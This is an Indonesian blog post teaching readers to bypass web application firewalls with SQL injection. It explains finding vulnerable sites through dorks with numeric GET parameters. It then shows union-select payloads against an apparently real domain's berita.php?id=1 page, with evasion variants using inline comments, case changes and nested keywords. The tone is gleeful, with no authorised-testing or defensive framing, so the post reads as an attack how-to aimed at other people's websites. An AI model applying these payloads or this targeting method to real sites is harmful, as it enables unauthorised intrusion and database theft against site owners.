Lompat ke konten Lompat ke sidebar Lompat ke footer
Beranda / Tips

Belajar menjebol firewall website dengan sql injection

Oleh Pernando Harianja Posting Komentar
Belajar menjebol firewall website dengan sql injection

 Post: Belajar menjebol firewall website dengan sql injection.

Cara ini adalah cara dimana saya berkelana didunia website dan kini memasuki fase aktif didunia komputer. Beberapa penjelajahan yang saya lakukan didunia internet, saya lebih hobby untuk mengubah cara berpikir saya dari orang lain. Cara yang paling saya sukai adalah mencari kesalahan yang ada didunia internet.

Bagaimana dengan kesalahan Website anda sendiri? Sudah pasti saya suka itu. Namun, ada beberapa website yang menggunakan firewall aktif dimana dengan nama menjebol itu cukup sulit diaplikasikan diwebsite tersebut, namun tepat pada malam ini ada kalanya kita bermain terka menerka dan bukan menerka password tetapi menerka apakah firewall website itu mempan dijebol atau tidak?

Firewall aplikasi web yang dirancang untuk melindungi aplikasi web dari serangan yang dikenal, seperti serangan injeksi SQL, yang biasa digunakan untuk berkompromi situs dan mencegat permintaan yang dikirim oleh klien serta menegakkan aturan ketat tentang format dan muatan mereka. Maka dari itu kita menunjukkan beberapa trik untuk memotong aplikasi Web firewall (WAF).

Cari website yang menggunakan dork dimana pemanggilannya lewat tanda tanya seperti ini
index.php?id=1 atau index.php?topik=2
Contoh diatas adalah website yang menggunakan akhiran tanda tanya yang dikhiri dengan angka atau huruf untuk memanggil data dari database itu sendiri dengan menggunakan metode get.
Contoh dibawah ini iwan sudah menemukan website dengan alamat dan memakai dork berita.php?id=1
www.work.or.id/berita.php?id=1
kemudian kita akan menambahkan perintah dibelakangnya dengan cara 1. SQL injection
www.work.or.id/berita.php?id=1 union all select 1,2,3,4,5— –
2. By passed Sqli www.work.or.id/berita.php?id=1 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5— –
Jika kedua cara diatas tidak berhasil berarti firewallnya memblokir perintah menggunakan metode huruf yang sama. Coba dengan metoda kedua dibawah ini
www.work.or.id/berita.php?id=1 UNION SELECT 1,2,3,4,5—
atau
www.work.or.id/berita.php?id=1 UNIunionON SEselectLECT 1,2,3,4,5– –

Jika firewall website tersebut tidak bekerja lagi maka alhasih anda juga dapat menjebolnya sekalipun firewallnya segudang. kwkwkwkwwkwk

Jangan dibagikan ke publik, ntar website kamu jadi sasarannya kelak. hehehehe SEKIAN TUTORIAL MENJEBOL FIREWALL WEBSITE.
Pernando Harianja
Pernando Harianja Pendiri dan Pengelola di InfoLoh.com, yang hobby dalam pembuatan Program Komputer, dan ngeBlog. Untuk kenal lebih dekat Follow IG saya: @pernando_harianja

Posting Komentar untuk "Belajar menjebol firewall website dengan sql injection"

Berkomentar dengan sopan, dan Dilarang menanamkan Link pada komentar